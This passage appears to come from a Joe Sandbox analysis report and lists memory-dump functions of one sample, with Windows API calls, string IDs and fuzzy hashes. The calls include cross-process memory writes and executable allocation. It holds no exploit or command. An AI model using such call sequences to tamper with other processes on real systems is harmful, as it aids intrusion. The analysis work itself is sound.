                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #$+
                                                                                                          • API String ID: 0-2552117581
                                                                                                          • Opcode ID: 50198a918fcd42f4f7580ca25e6d15b3158b28717c9ced3bb1ebb94fa1c58e5a
                                                                                                          • Instruction ID: 29d3d79043e745edb63cb4906ce19ac50fc8d4f870b9467f953ec947e908c20a
                                                                                                          • Opcode Fuzzy Hash: 50198a918fcd42f4f7580ca25e6d15b3158b28717c9ced3bb1ebb94fa1c58e5a
                                                                                                          • Instruction Fuzzy Hash: 85510175500255CFDF29EF68D880AFA7BA4EF56328F142057EC91BB290D734AD86CB60
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_free
                                                                                                          • String ID: #V
                                                                                                          • API String ID: 2620147621-3658881132
                                                                                                          • Opcode ID: 8bce29921d4ecfbd28c6fe1a685190d529c8b33ae6e5897f96e4c89816f4ca7f
                                                                                                          • Instruction ID: 7300678581917208164763c595dcaec391dcc8b29467e95ee06f983d30f026bc
                                                                                                          • Opcode Fuzzy Hash: 8bce29921d4ecfbd28c6fe1a685190d529c8b33ae6e5897f96e4c89816f4ca7f
                                                                                                          • Instruction Fuzzy Hash: D65159716087418FDB24CF28D491B2BBBE1FF85358F05592DE999A7351EB31E801CB92
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memset$_memmove
                                                                                                          • String ID: ERCP
                                                                                                          • API String ID: 2532777613-1384759551
                                                                                                          • Opcode ID: a24c214f370010cb0b480bab7ec856f63162d0d333507f65a09997cff5bf6d93
                                                                                                          • Instruction ID: bb4a0da0116710f7c83a470857b3b0bebe8f2595b86ad5b08c14c3e06065e7fb
                                                                                                          • Opcode Fuzzy Hash: a24c214f370010cb0b480bab7ec856f63162d0d333507f65a09997cff5bf6d93
                                                                                                          • Instruction Fuzzy Hash: 0E51C3719047099FDB34CF64C8817AABBF5EF44315F24996EE94AEB281E730D589CB40
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EA1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E99E4E,?,?,00000034,00000800,?,00000034), ref: 00EA1CE5
                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E9A3F7
                                                                                                            • Part of subcall function 00EA1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E99E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00EA1CB0
                                                                                                            • Part of subcall function 00EA1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00EA1C08
                                                                                                            • Part of subcall function 00EA1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E99E12,00000034,?,?,00001004,00000000,00000000), ref: 00EA1C18
                                                                                                            • Part of subcall function 00EA1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E99E12,00000034,?,?,00001004,00000000,00000000), ref: 00EA1C2E
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E9A464
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E9A4B1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                          • String ID: @
                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                          • Opcode ID: de6685bec8949767831a3b88742cf636969784a56eea9f0df7a111af11a7fd20
                                                                                                          • Instruction ID: 0dd0482d74ad17d6b670ff1acc4d2567c747d904c6d227383606f2f9933381d3
                                                                                                          • Opcode Fuzzy Hash: de6685bec8949767831a3b88742cf636969784a56eea9f0df7a111af11a7fd20
                                                                                                          • Instruction Fuzzy Hash: 88414C7290121CAFCF10DBA4CD85ADEB7B8EF49310F1440A5FA55BB181DA706E45CBA1
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EC7A86
                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EC7A9A
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EC7ABE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window
                                                                                                          • String ID: SysMonthCal32
                                                                                                          • API String ID: 2326795674-1439706946
                                                                                                          • Opcode ID: d95e85f020ab1e0955f332d7df2d37ab1425f01f739ef190dc5d21a371009c2e
                                                                                                          • Instruction ID: 6f7233df0e6e5e7f9864d151dd15abccbca2a23429be3a080aeba830895f7298
                                                                                                          • Opcode Fuzzy Hash: d95e85f020ab1e0955f332d7df2d37ab1425f01f739ef190dc5d21a371009c2e
                                                                                                          • Instruction Fuzzy Hash: B321A132604218BFDF118F64DC42FEE3BA9EF48724F111218FE557B1D0DAB2A8559BA0
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EC826F
                                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EC827D
                                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EC8284
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                                          • String ID: msctls_updown32
                                                                                                          • API String ID: 4014797782-2298589950
                                                                                                          • Opcode ID: ae2f31209e5d019ae8eb370f278f4865a15af6a5947a2557c023d3f5f9f218ce
                                                                                                          • Instruction ID: 537cc05966f7e688536e69ce05521e7c43f6945cd559c81542595dac9b8f6271
                                                                                                          • Opcode Fuzzy Hash: ae2f31209e5d019ae8eb370f278f4865a15af6a5947a2557c023d3f5f9f218ce
                                                                                                          • Instruction Fuzzy Hash: 232195B1A04208AFDB00DF54DE85E6737EDEB49354B18505DFA01A7261CB71EC12DBA0
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EC7360
                                                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EC7370
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EC7395
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$MoveWindow
                                                                                                          • String ID: Listbox
                                                                                                          • API String ID: 3315199576-2633736733
                                                                                                          • Opcode ID: 9d0db920283c2e7b5130114158a65c25bcb6c68635bfea3f02fb62148e2beb0c
                                                                                                          • Instruction ID: cfcb46c630090d0d2b1b81be1c870fcd9ef480705005b204b085d786cc3799e8
                                                                                                          • Opcode Fuzzy Hash: 9d0db920283c2e7b5130114158a65c25bcb6c68635bfea3f02fb62148e2beb0c
                                                                                                          • Instruction Fuzzy Hash: D221C532604218BFDF118F58DC45FBF37AAEB89754F119129FD50AB190C672AC529BA0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E7B544: _memset.LIBCMT ref: 00E7B551
                                                                                                            • Part of subcall function 00E60B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E7B520,?,?,?,00E4100A), ref: 00E60B79
                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,00E4100A), ref: 00E7B524
                                                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E4100A), ref: 00E7B533
                                                                                                          Strings
                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E7B52E
                                                                                                          • =, xrefs: 00E7B514
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=
                                                                                                          • API String ID: 3158253471-1801005180
                                                                                                          • Opcode ID: 504fe457eab240a6ea482b5f6faa308ec7e8b7b1342dd7a15c3c171c8bb0f15d
                                                                                                          • Instruction ID: e693137711fc22c7ee4fc6c4076c0780d0c21b7158c1323b0f8526aad4369b21
                                                                                                          • Opcode Fuzzy Hash: 504fe457eab240a6ea482b5f6faa308ec7e8b7b1342dd7a15c3c171c8bb0f15d
                                                                                                          • Instruction Fuzzy Hash: 96E06D702003518FD320AF3AF8097027BE0AF04308F04995EE48AE7341DBB4E508CB91
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00E8027A,?), ref: 00EBC6E7
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EBC6F9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                          • API String ID: 2574300362-1816364905
                                                                                                          • Opcode ID: 7c26f7d917dff757982230e5f1924a0acb19ab0a520c84bea0d22583cdb3d463
                                                                                                          • Instruction ID: 375795d14b58f1b11b8a924fed01e465b84d504ef4b518be2950250fe2337a55
                                                                                                          • Opcode Fuzzy Hash: 7c26f7d917dff757982230e5f1924a0acb19ab0a520c84bea0d22583cdb3d463
                                                                                                          • Instruction Fuzzy Hash: 67E08C392153238FD7204B36EC49B9676D4EB04309F64A42BE885F2310DB70C8408B10
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00E54AF7,?), ref: 00E54BB8
                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E54BCA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                          • API String ID: 2574300362-1355242751
                                                                                                          • Opcode ID: 8ce1126e4cfcae2b6fb44f72eb3bf59d6d898bc1eeaaaf73bfcd4bb72ebc020a
                                                                                                          • Instruction ID: 8e5b54cadb38c8137bb119180bc859fe0416e42bf438239235a603c1656024c0
                                                                                                          • Opcode Fuzzy Hash: 8ce1126e4cfcae2b6fb44f72eb3bf59d6d898bc1eeaaaf73bfcd4bb72ebc020a
                                                                                                          • Instruction Fuzzy Hash: 00D012715117138FD7205F31EC0874676D5EF04355F15AD6AD8D5F2594DB70D4C4C610
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00E54B44,?,00E549D4,?,?,00E527AF,?,00000001), ref: 00E54B85
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E54B97
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
• Opcode ID: ce1ec7eebcd1855219e65d96041c4d7a56019e83a463dff7e1da09768d4b1c66
• Instruction ID: e3212763d6f4f55b6aed40537bd0fb32009793ab2f226d24b8bd5b73843fbb93
• Opcode Fuzzy Hash: ce1ec7eebcd1855219e65d96041c4d7a56019e83a463dff7e1da09768d4b1c66
• Instruction Fuzzy Hash: CDD017B15117128FD7209F32EC18B0A77E4EF0435AF19AC2AD8D6F2690E770E8C4CA10
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00EC1696), ref: 00EC1455
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EC1467
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
• Opcode ID: 727e7be782f415391c0e4bcd03c79ebf56296486b174d46044612ee3116d7611
• Instruction ID: 3042589396ebee69257a07d8173efeb910f76e92df1f32bfd096baaf81a2e945
• Opcode Fuzzy Hash: 727e7be782f415391c0e4bcd03c79ebf56296486b174d46044612ee3116d7611
• Instruction Fuzzy Hash: 87D017305527178FE7209F76EA08B1676E4EF0639AF25D86E94E6F2160EB70D8C4CA50
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00E55E3D), ref: 00E555FE
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E55610
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
• Opcode ID: 3ad91f5ad31d4cf37119f6d3e7117f7d4f6b9de0081d934ca332b580b35662a5
• Instruction ID: dfc1f34f7eadc1f00c5b614ca4f9318b023f6aa882b70e72bcb58ea30fcd243a
• Opcode Fuzzy Hash: 3ad91f5ad31d4cf37119f6d3e7117f7d4f6b9de0081d934ca332b580b35662a5
• Instruction Fuzzy Hash: FFD012755117128FD7205F31E81871676D4EF44356F19AC2BD895F2251D7B0C485C650
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,00EB93DE,?,00ED0980), ref: 00EB97D8
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00EB97EA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
• Opcode ID: 84f17088396ef11e3330a9ac67319101ab61070f4df4447f5bbbfccc2f31ce6b
• Instruction ID: de33da4afbe9b79d57b0bb10716c30abe4f64b57b9ed7ff94ecebdb8a3e951ee
• Opcode Fuzzy Hash: 84f17088396ef11e3330a9ac67319101ab61070f4df4447f5bbbfccc2f31ce6b
• Instruction Fuzzy Hash: 4ED0E2705217238FD7209F32E88879AB6E4EF48395F19A82B95D6F2250EB70C8808A11
APIs
• CharLowerBuffW.USER32(?,?), ref: 00EBE7A7
• CharLowerBuffW.USER32(?,?), ref: 00EBE7EA
  • Part of subcall function 00EBDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EBDEAE
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00EBE9EA
• _memmove.LIBCMT ref: 00EBE9FD
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: BuffCharLower$AllocVirtual_memmove
• String ID:
• API String ID: 3659485706-0
• Opcode ID: cc89a2753a1646cb4d9acd9217221076d881d89c0984106fa1977fa70354a526
• Instruction ID: 22b832f88a3ddfe4dcc884170f9f94ec85d098aed886d0e5e8299e4427b7b9e9
• Opcode Fuzzy Hash: cc89a2753a1646cb4d9acd9217221076d881d89c0984106fa1977fa70354a526
• Instruction Fuzzy Hash: C7C16B71A083119FC714DF24C480AABBBE4FF89718F14996EF899AB351D731E945CB82
APIs
• CoInitialize.OLE32(00000000), ref: 00EB87AD
• CoUninitialize.OLE32 ref: 00EB87B8
  • Part of subcall function 00ECDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00EB8A0E,?,00000000), ref: 00ECDF71
• VariantInit.OLEAUT32(?), ref: 00EB87C3
• VariantClear.OLEAUT32(?), ref: 00EB8A94
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
• Opcode ID: a6bce5d48924c95ad5913a1dbf3636df3b45c0fa90327c710be671db148c8095
• Instruction ID: 918b758c6e5c666562509b8b50d33bd872070f8b66c4f836f39c56185ba6ea00
• Opcode Fuzzy Hash: a6bce5d48924c95ad5913a1dbf3636df3b45c0fa90327c710be671db148c8095
• Instruction Fuzzy Hash: D1A16A75704B019FCB10EF54D581B6AB7E8BF88314F549849F999AB3A2CB30ED04CB92
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00ED3C4C,?), ref: 00E98308
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00ED3C4C,?), ref: 00E98320
• CLSIDFromProgID.OLE32(?,?,00000000,00ED0988,000000FF,?,00000000,00000800,00000000,?,00ED3C4C,?), ref: 00E98345
• _memcmp.LIBCMT ref: 00E98366
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
